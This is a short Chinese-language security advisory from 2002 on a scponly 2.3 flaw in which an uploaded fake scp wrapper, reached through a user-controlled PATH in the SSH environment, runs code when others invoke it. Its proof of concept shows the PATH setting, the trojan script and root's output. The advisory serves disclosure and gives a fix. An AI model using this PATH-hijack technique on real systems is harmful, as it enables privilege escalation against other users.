SCPOnly SSH环境SHELL脱离漏洞发布时间:2002-08-28 更新时间:2002-08-28 严重程度:中 威胁程度:欺骗 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:5526 受影响系统 scponly scponly 2.3详细描述 scponly是免费开放源代码安全拷贝客户端,可使用在多种操作系统下。 默认安装的scponly没有充分对.ssh子目录进行很好的访问控制,远程用户如果可以上载任意文件到用户端目录,并使用伪造的scp或者sftp命令,当其他用户执行的时候,可以导致包含在伪造文件中的代码执行,如果高权限用户执行可以导致权限提升。 测试代码 如用户使用SCP在如下环境中: # ssh environment PATH=/home/myhomedir/:/usr/bin:/bin #end 攻击者上载文件到用户目录中: #!/bin/sh echo "I'm a bad boy" > /tmp/exploit /usr/bin/scp $@ # end 设置名为scp,当其他人执行的时候: [root@restricted /tmp] # ls -l total 24 -rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit [root@restricted /tmp] # cat exploit I'm a bad boy 解决方案 限制用户的目录权限。 相关信息 Derek D. Martin <ddm@pizzashack.org>. 参考:http://online.securityfocus.com/archive/1/288245 相关主页:http://www.sublimation.org/scponly/ |
